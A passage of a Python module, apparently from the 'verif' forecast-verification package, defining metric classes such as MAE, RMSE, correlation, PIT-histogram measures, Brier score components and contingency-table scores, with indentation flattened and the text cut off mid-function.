import verif.aggregator
import verif.axis
import verif.interval
import verif.util
def get_all():
"""
   Returns a list of (name, class) tuples for all metric classes, where name
   is the class name (string) and class is the class object
"""
temp = inspect.getmembers(sys.modules[__name__], inspect.isclass)
return temp
def get_all_by_type(type):
"""
   Like get_all, except only return metrics that are of a certain
verif.metric_type
"""
temp = [m for m in get_all() if m[1].type == type]
return temp
def get_all_obs_fcst_based():
""" Like get_all, except only return obs-fcst-based metric classes """
metrics = [metric for metric in get_all() if issubclass(metric[1], verif.metric.ObsFcstBased)]
return metrics
def get(name):
""" Returns an instance of an object with the given class name """
metrics = get_all()
m = None
for metric in metrics:
if name == metric[0].lower() and metric[1].is_valid():
m = metric[1]()
return m
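# Illustrative: get("mae") returns a Mae instance and get("rmse") a Rmse
# instance; the name is matched against the lower-cased class name.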
def get_p(data, input_index, axis, axis_index, interval):
"""
Retrieves and computes forecast probability and verifying observation for
being inside interval
Returns:
obs (np.array): True when observation is inside interval
      p (np.array): Forecast probability of the value being inside the interval
"""
p0 = 0
p1 = 1
if interval.lower != -np.inf and interval.upper != np.inf:
var0 = verif.field.Threshold(interval.lower)
var1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), var0, var1],
input_index, axis, axis_index)
elif interval.lower != -np.inf:
var0 = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), var0], input_index,
axis, axis_index)
elif interval.upper != np.inf:
var1 = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), var1], input_index,
axis, axis_index)
obsP = interval.within(obs)
p = p1 - p0 # Prob of obs within range
return [obsP, p]
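# Illustrative: for an interval (a, b], p is the difference of the forecast
# probabilities stored for the two thresholds, i.e. roughly P(x <= b) - P(x <= a).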
def get_q(data, input_index, axis, axis_index, interval):
"""
Retrieve forecast quantile and verifying observation
Returns:
      obs (np.array): Verifying observations
      q (np.array): Forecast values at the quantile given by interval.lower
"""
p0 = 0
p1 = 1
var = verif.field.Quantile(interval.lower)
[obs, q] = data.get_scores([verif.field.Obs(), var], input_index, axis, axis_index)
return [obs, q]
class Metric(object):
""" Class to compute a score for a verification metric
Scores are computed by retrieving information from a verif.data.Data object.
As data is organized in multiple dimensions, scores are computed for a
particular verif.axis.Axis. Also data objects have several input files, so
scores are computed for a particular input.
The ObsFcstBased class offers a simple way to design a metric that only
uses observations and forecasts from data.
Class attributes:
description (str): A short one-liner describing the metric. This will show
up in the main verif documentation.
long (str): A longer description. This will show up in the
documentation when a specific metric is chosen.
min (float): Minimum possible value the metric can take on. None if no min.
max (float): Maximum possible value the metric can take on. None if no max.
require_threshold_type (str) : What type of thresholds does this metric
require? One of 'None', 'deterministic', 'threshold', 'quantile'.
supports_threshold (bool) : Does it make sense to use '-x threshold' with this metric?
supports_field (bool) : Does it make sense to use '-x obs' or '-x fcst' with this metric?
orientation (int): 1 for a positively oriented score (higher values are better),
-1 for negative, and 0 for all others
reference (str): A string with an academic reference
supports_aggregator: Does this metric use self.aggregator?
type (verif.metric_type.MetricType): What type of metric is this?
To implement a new metric:
      Fill out cls.description and implement compute_single(). The other class
attributes (see above) are optional.
"""
# This must be overloaded
description = None
# Default values
long = None
reference = None
orientation = 0
min = None
max = None
default_axis = verif.axis.Leadtime() # If no axis is specified, use this axis as default
default_bin_type = None
require_threshold_type = None
supports_threshold = False
supports_field = False
perfect_score = None
aggregator = verif.aggregator.Mean()
supports_aggregator = False
type = verif.metric_type.Deterministic()
def compute(self, data, input_index, axis, interval):
""" Compute the score along an axis
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
         axis (verif.axis.Axis): Axis to compute the score for
interval: Compute score for this interval (only applies to some metrics)
Returns:
np.array: A 1D numpy array of one score for each slice along axis
"""
size = data.get_axis_size(axis)
scores = np.zeros(size, 'float')
# Loop through axis indices
for axis_index in range(0, size):
x = self.compute_single(data, input_index, axis, axis_index, interval)
scores[axis_index] = x
return scores
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Computes the score for a given slice
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
         axis (verif.axis.Axis): Axis to compute the score for
axis_index (int): Slice along the axis
interval: Compute score for this interval (only applies to some metrics)
Returns:
float: Value representing the score for the slice
"""
raise NotImplementedError()
def label(self, variable):
""" What is an appropriate y-axis label for this metric? Override this if
the metric does not have the same units as the forecast variable """
return self.name + " (" + variable.units + ")"
class ClassProperty(property):
def __get__(self, cls, owner):
return self.fget.__get__(None, owner)()
@ClassProperty
@classmethod
def name(cls):
""" Use the class name as default
"""
return cls.get_class_name()
@classmethod
def is_valid(cls):
""" Is this a valid metric that can be initialized? """
return cls.description is not None
@classmethod
def help(cls):
s = ""
if cls.description is not None:
s = cls.description
      if cls.orientation != 0:
s = s + "\n" + verif.util.green("Orientation: ")
if cls.orientation == 1:
s = s + "Positive (higher values are better)"
elif cls.orientation == -1:
s = s + "Negative (lower values are better)"
else:
s = s + "None"
if cls.perfect_score is not None:
s = s + "\n" + verif.util.green("Perfect score: ") + str(cls.perfect_score)
if cls.min is not None:
s = s + "\n" + verif.util.green("Minimum value: ") + str(cls.min)
if cls.max is not None:
s = s + "\n" + verif.util.green("Maximum value: ") + str(cls.max)
if cls.long is not None:
s = s + "\n" + verif.util.green("Description: ") + cls.long
if cls.reference is not None:
s = s + "\n" + verif.util.green("Reference: ") + cls.reference
return s
@classmethod
def get_class_name(cls):
name = cls.__name__
return name
class ObsFcstBased(Metric):
""" Class for scores that are based on observations and deterministic forecasts only """
type = verif.metric_type.Deterministic()
supports_field = True
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
assert(obs.shape[0] == fcst.shape[0])
if axis == verif.axis.Obs():
I = np.where(interval.within(obs))
obs = obs[I]
fcst = fcst[I]
elif axis == verif.axis.Fcst():
I = np.where(interval.within(fcst))
obs = obs[I]
fcst = fcst[I]
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval=None):
""" Compute the score using only the observations and forecasts
obs and fcst must have the same length, but may contain nan values
Arguments:
obs (np.array): 1D array of observations
fcst (np.array): 1D array of forecasts
Returns:
float: Value of score
"""
# Remove missing values
I = np.where((np.isnan(obs) | np.isnan(fcst)) == 0)[0]
obs = obs[I]
fcst = fcst[I]
if obs.shape[0] > 0:
return self._compute_from_obs_fcst(obs, fcst)
else:
return np.nan
def _compute_from_obs_fcst(self, obs, fcst):
""" Compute the score
Obs and fcst are guaranteed to:
- have the same length
- length >= 1
- no missing values
"""
raise NotImplementedError()
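# Illustrative example (not part of verif): a minimal deterministic metric.
# An ObsFcstBased subclass only needs a description and _compute_from_obs_fcst(),
# which receives equal-length, non-empty arrays with missing values removed.
class MaxError(ObsFcstBased):
   description = "Maximum absolute error (example metric)"
   min = 0
   perfect_score = 0
   orientation = -1
   def _compute_from_obs_fcst(self, obs, fcst):
      return np.max(np.abs(obs - fcst))
   def label(self, variable):
      return "Max error (" + variable.units + ")"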
class FromField(Metric):
supports_aggregator = True
supports_field = True
def __init__(self, field, aux=None):
""" Compute scores from a field
Arguments:
         field (verif.field.field): Retrieve data from this field
aux (verif.field.Field): When reading field, also pull values for
this field to ensure only common data points are returned
"""
self._field = field
self._aux = aux
def compute_single(self, data, input_index, axis, axis_index, interval):
fields = [self._field]
axis_pos = None
if axis == verif.axis.Obs():
if self._field != verif.field.Obs():
fields += [verif.field.Obs()]
axis_pos = len(fields) - 1
elif axis == verif.axis.Fcst():
if self._field != verif.field.Fcst():
fields += [verif.field.Fcst()]
axis_pos = len(fields) - 1
if self._aux is not None:
fields += [self._aux]
values_array = data.get_scores(fields, input_index, axis, axis_index)
values = values_array[0]
# Subset if we have a subsetting axis
if axis_pos is not None:
I = np.where(interval.within(values_array[axis_pos]))[0]
values = values[I]
return self.aggregator(values)
def label(self, variable):
return self.aggregator.name().title() + " of " + self._field.name()
class Obs(FromField):
""" Retrives the observation
Note: This cannot be a subclass of ObsFcstBased, since we don't want
to remove obs for which the forecasts are missing. Same for Fcst.
"""
type = verif.metric_type.Deterministic()
name = "Observation"
description = "Observed value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Obs, self).__init__(verif.field.Obs())
def label(self, variable):
return self.aggregator.name().title() + " of observation (" + variable.units + ")"
class Fcst(FromField):
type = verif.metric_type.Deterministic()
name = "Forecast"
description = "Forecasted value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Fcst, self).__init__(verif.field.Fcst())
def label(self, variable):
return self.aggregator.name().title() + " of forecast (" + variable.units + ")"
class Mae(ObsFcstBased):
description = "Mean absolute error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
name = "Mean absolute error"
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(abs(obs - fcst))
def label(self, variable):
return "MAE (" + variable.units + ")"
class Bias(ObsFcstBased):
name = "Bias"
description = "Bias (forecast - observation)"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst - obs)
class Diff(ObsFcstBased):
name = "Diff"
description = "Difference in aggregated statistics (agg(forecast) - agg(observation))"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst) - self.aggregator(obs)
class Ratio(ObsFcstBased):
name = "Ratio"
description = "Ratio of aggregated statistics (agg(forecast) / agg(observation))"
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = self.aggregator(fcst)
denum = self.aggregator(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return "Ratio"
class Ef(ObsFcstBased):
name = "Exceedance fraction"
description = "Exeedance fraction: fraction of times that forecasts > observations"
min = 0
max = 1
perfect_score = 0.5
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
Nfcst = np.sum(obs < fcst)
return Nfcst / 1.0 / len(fcst)
def label(self, variable):
return "Fraction fcst > obs"
class StdError(ObsFcstBased):
name = "Standard error"
description = "Standard error (i.e. RMSE if forecast had no bias)"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
bias = np.mean(obs - fcst)
return np.mean((obs - fcst - bias) ** 2) ** 0.5
class Rmse(ObsFcstBased):
name = "Root mean squared error"
description = "Root mean squared error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator((obs - fcst) ** 2) ** 0.5
def label(self, variable):
return "RMSE (" + variable.units + ")"
class Rmsf(ObsFcstBased):
name = "Root mean squared factor"
description = "Root mean squared factor"
min = 0
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.exp(self.aggregator((np.log(fcst / obs)) ** 2) ** 0.5)
def label(self, variable):
return "RMSF (" + variable.units + ")"
class Cmae(ObsFcstBased):
name = "Cube-root mean absolute cubic error"
description = "Cube-root mean absolute cubic error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return (self.aggregator(abs(obs ** 3 - fcst ** 3))) ** (1.0 / 3)
def label(self, variable):
return "CMAE (" + variable.units + ")"
class Nsec(ObsFcstBased):
name = "Nash-Sutcliffe efficiency coefficient"
description = "Nash-Sutcliffe efficiency coefficient"
min = 0
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
num = np.sum((fcst - obs) ** 2)
denom = np.sum((obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return "NSEC"
class Alphaindex(ObsFcstBased):
name = "Alpha index"
description = "Alpha index"
perfect_score = 0
orientation = -1
max = 2
min = 0
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
meanfcst = np.mean(fcst)
num = np.sum((fcst - obs - meanfcst + meanobs) ** 2)
denom = np.sum((fcst - meanfcst) ** 2 + (obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return self.name
class Leps(ObsFcstBased):
name = "Linear error in probability space"
description = "Linear error in probability space"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
N = len(obs)
# Compute obs quantiles
Iobs = np.array(np.argsort(obs), 'float')
qobs = Iobs / N
# Compute the quantiles that the forecasts are relative
# to the observations
qfcst = np.zeros(N, 'float')
sortobs = np.sort(obs)
for i in range(0, N):
I = np.where(fcst[i] < sortobs)[0]
         if len(I) > 0:
qfcst[i] = float(I[0]) / N
else:
qfcst[i] = 1
return np.mean(abs(qfcst - qobs))
def label(self, variable):
return "LEPS"
class Dmb(ObsFcstBased):
name = "Degree of mass balance"
description = "Degree of mass balance (obs/fcst)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.mean(obs) / np.mean(fcst)
def label(self, variable):
return self.description
class Mbias(ObsFcstBased):
name = "Multiplicative bias"
description = "Multiplicative bias (fcst/obs)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = np.nanmean(fcst)
denum = np.nanmean(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return self.description
class Corr(ObsFcstBased):
name = "Correlation"
description = "Correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return np.corrcoef(obs, fcst)[1, 0]
def label(self, variable):
return self.name
class RankCorr(ObsFcstBased):
name = "Rank correlation"
description = "Rank correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
return scipy.stats.spearmanr(obs, fcst)[0]
def label(self, variable):
return self.name
class KendallCorr(ObsFcstBased):
name = "Kendall correlation"
description = "Kendall correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return scipy.stats.kendalltau(obs, fcst)[0]
def label(self, variable):
return self.name
class DError(ObsFcstBased):
name = "Distribution Error"
description = "Distribution error"
min = 0
perfect_score = 0
supports_aggregator = False
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
sortedobs = np.sort(obs)
sortedfcst = np.sort(fcst)
return np.mean(np.abs(sortedobs - sortedfcst))
class Pit(Metric):
""" Retrives the PIT-value corresponding to the observation """
type = verif.metric_type.Probabilistic()
name = "Probability integral transform"
description = "Verifying PIT-value (CDF at observation)"
supports_aggregator = True
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(verif.field.Pit(), input_index, axis, axis_index)
return self.aggregator(pit)
def label(self, variable):
return self.aggregator.name().title() + " of verifying PIT"
class PitHistDev(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram deviation factor"
description = "PIT histogram deviation factor (actual deviation / expected deviation)"
min = 0
# max = 1
perfect_score = 1
orientation = -1
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(self._field, input_index, axis, axis_index)
nb = len(self._bins) - 1
D = self.deviation(pit, nb)
D0 = self.expected_deviation(pit, nb)
dev = D / D0
return dev
def label(self, variable):
return self.name
@staticmethod
def expected_deviation(values, numBins):
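      # Expected deviation of a perfectly calibrated (flat) PIT histogram due to
      # sampling noise alone, given len(values) samples spread over numBins bins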
if len(values) == 0 or numBins == 0:
return np.nan
return np.sqrt((1.0 - 1.0 / numBins) / (len(values) * numBins))
@staticmethod
def deviation(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
return np.sqrt(1.0 / numBins * np.sum((n - 1.0 / numBins) ** 2))
@staticmethod
def deviation_std(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
n = len(values)
p = 1.0 / numBins
numPerBinStd = np.sqrt(n * p * (1 - p))
std = numPerBinStd / n
return std
# What reduction in ignorance is possible by calibrating the PIT-histogram?
@staticmethod
def ignorance_potential(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
expected = 1.0 / numBins
ign = np.sum(n * np.log2(n / expected)) / sum(n)
return ign
class PitHistSlope(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram slope"
description = "Average slope of the PIT histogram. Positive mean too many obs in the higher ranks."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the average slope across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
return np.mean(d)
def label(self, variable):
return self.name
class PitHistShape(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram shape"
description = "Second derivative of the PIT histogram. Negative means U-shaped."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the second derivative across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
centers2 = (centers[1:] + centers[0:-1]) / 2
dx2 = np.diff(centers2)
dd = np.diff(d) / dx2
return np.mean(dd)
def label(self, variable):
return self.name
class MarginalRatio(Metric):
type = verif.metric_type.Probabilistic()
name = "Marginal ratio"
description = "Ratio of marginal probability of obs to marginal" \
" probability of fcst. Use -r to specify thresholds."
min = 0
perfect_score = 1
require_threshold_type = "threshold"
supports_threshold = True
default_axis = verif.axis.Threshold()
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
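      # Build the forecast probability of the event from the probabilities at the
      # interval endpoints: p = p1 - p0, with one-sided intervals handled by the
      # first two branches; the score is mean(observed occurrence) / mean(p).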
if np.isinf(interval.lower):
pvar = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), pvar], input_index, axis, axis_index)
p0 = 0 * p1
elif np.isinf(interval.upper):
pvar = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), pvar], input_index,
axis, axis_index)
p1 = 0 * p0 + 1
else:
pvar0 = verif.field.Threshold(interval.lower)
pvar1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), pvar0, pvar1],
input_index, axis, axis_index)
obs = interval.within(obs)
p = p1 - p0
if np.mean(p) == 0:
return np.nan
return np.mean(obs) / np.mean(p)
def label(self, variable):
return "Ratio of marginal probs: Pobs/Pfcst"
class Within(Metric):
   """ Can't be a subclass of ObsFcstBased, because it depends on threshold """
   type = verif.metric_type.Deterministic()
name = "Within"
description = "The percentage of forecasts within some error bound. Use -r to specify error bounds"
min = 0
max = 100
default_bin_type = "below"
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 100
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(),
verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
diff = abs(obs - fcst)
return np.mean(interval.within(diff)) * 100
def label(self, variable):
return "% of forecasts"
class Conditional(Metric):
"""
Computes the mean y conditioned on x. For a given range of x-values, what is
the average y-value?
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.mean):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(fcst[I])
class XConditional(Metric):
"""
Mean x when conditioned on x. Average x-value that is within a given range.
The reason the y-variable is added is to ensure that the same data is used
for this metric as for the Conditional metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.median):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(obs[I])
class Count(Metric):
"""
   Counts how many values of a specific variable are within the threshold range.
Not a real metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x):
self._x = x
def compute_single(self, data, input_index, axis, axis_index, interval):
values = data.get_scores(self._x, input_index, axis, axis_index)
I = np.where(interval.within(values))[0]
if len(I) == 0:
return np.nan
return len(I)
class Quantile(Metric):
type = verif.metric_type.Probabilistic()
min = 0
max = 1
def __init__(self, quantile):
self._quantile = quantile
def compute_single(self, data, input_index, axis, axis_index, interval):
var = verif.field.Quantile(self._quantile)
scores = data.get_scores(var, input_index, axis, axis_index)
return verif.util.nanmean(scores)
class Bs(Metric):
type = verif.metric_type.Probabilistic()
name = "Brier score"
description = "Brier score"
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
reference = "Glenn W. Brier, 1950: Verification of forecasts expressed in terms of probability. Mon. Wea. Rev., 78, 1-3."
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Compute probabilities based on thresholds """
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(obs), 'float')
return np.nanmean((fcst-obs)**2)
def label(self, variable):
return self.name
class BsRel(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "brier skill score, reliability term"
description = "Brier score, reliability term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
"""
      Break p into bins, and compute reliability, but save each reliability
value in an array the same size as fcst. In this way we do not need to do
a weighted average
"""
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (fcst[I] - obs_mean_I) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsRes(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, resolution term"
description = "Brier score, resolution term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (obs_mean_I - obs_mean) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsUnc(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, uncertainty term"
description = "Brier score, uncertainty term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = None
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
return bsunc
def label(self, variable):
return self.name
class Bss(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier skill score"
description = "Brier skill score"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
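      # Skill relative to a climatological reference forecast:
      # BSS = (BS_unc - BS) / BS_unc = 1 - BS / BS_unc, where BS_unc is the
      # Brier score of always forecasting the observed base rate.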
bs = np.nanmean((fcst - obs)**2)
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
if bsunc == 0:
bss = np.nan
else:
bss = (bsunc - bs) / bsunc
return bss
def label(self, variable):
return self.name
class QuantileScore(Metric):
type = verif.metric_type.Probabilistic()
name = "Quantile score"
description = "Quantile score. Use -q to set which quantiles to use."
min = 0
require_threshold_type = "quantile"
supports_threshold = True
perfect_score = 0
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, q] = get_q(data, input_index, axis, axis_index, interval)
qs = np.nan * np.zeros(len(q), 'float')
v = q - obs
qs = v * (interval.lower - (v < 0))
return np.mean(qs)
def label(self, variable):
return self.name
class Ign0(Metric):
type = verif.metric_type.Probabilistic()
name = "Binary ignorance"
description = "Ignorance of the binary probability based on threshold"
require_threshold_type = "threshold"
supports_threshold = True
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
ign = -np.log2(p)
ign[I0] = -np.log2(1 - p[I0])
return np.mean(ign)
def label(self, variable):
return self.name
class Spherical(Metric):
type = verif.metric_type.Probabilistic()
name = "Spherical score"
description = "Spherical probabilistic scoring rule for binary events"
require_threshold_type = "threshold"
supports_threshold = True
max = 1
min = 0
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
sp = p / np.sqrt(p ** 2 + (1 - p) ** 2)
sp[I0] = (1 - p[I0]) / np.sqrt((p[I0]) ** 2 + (1 - p[I0]) ** 2)
return np.mean(sp)
def label(self, variable):
return self.name
class Contingency(Metric):
"""
Metrics based on 2x2 contingency table for a given interval. Observations
and forecasts are converted into binary values, that is if they are within
or not within an interval.
"""
type = verif.metric_type.Threshold()
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "deterministic"
supports_threshold = True
_usingQuantiles = False
def compute_from_abcd(self, a, b, c, d):
""" Compute the score given the 4 values in the 2x2 contingency table:
Arguments:
a (float): Hit
b (float): False alarm
c (float): Miss
d (float): Correct rejection
Returns:
float: The score
"""
raise NotImplementedError()
def label(self, variable):
return self.name
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def _quantile_to_threshold(self, values, interval):
"""
Convert an interval of quantiles to interval thresholds, for example
converting [10%, 50%] of some precip values to [5 mm, 25 mm]
Arguments:
values (np.array): values to compute thresholds for
interval (verif.interval.Interval): interval of quantiles
Returns:
verif.interval.Interval: Interval of thresholds
"""
sorted = np.sort(values)
lower = -np.inf
upper = np.inf
if not np.isinf(abs(interval.lower)):
lower = np.percentile(sorted, interval.lower * 100)
      if not np.isinf(abs(interval.upper)):
upper = np.percentile(sorted, interval.upper * 100)
return verif.interval.Interval(lower, upper, interval.lower_eq, interval.upper_eq)
def _compute_abcd(self, obs, fcst, interval, f_interval=None):
if f_interval is None:
f_interval = interval
      a = b = c = d = np.nan
if len(fcst) > 0:
# Compute frequencies
if self._usingQuantiles:
fcstSort = np.sort(fcst)
obsSort = np.sort(obs)
f_qinterval = self._quantile_to_threshold(fcstSort, f_interval)
o_qinterval = self._quantile_to_threshold(obsSort, interval)
a = np.ma.sum(f_qinterval.within(fcst) & o_qinterval.within(obs)) # Hit
b = np.ma.sum(f_qinterval.within(fcst) & (o_qinterval.within(obs) == 0)) # FA
c = np.ma.sum((f_qinterval.within(fcst) == 0) & o_qinterval.within(obs)) # Miss
d = np.ma.sum((f_qinterval.within(fcst) == 0) & (o_qinterval.within(obs) == 0)) # CR
else:
a = np.ma.sum(f_interval.within(fcst) & interval.within(obs)) # Hit
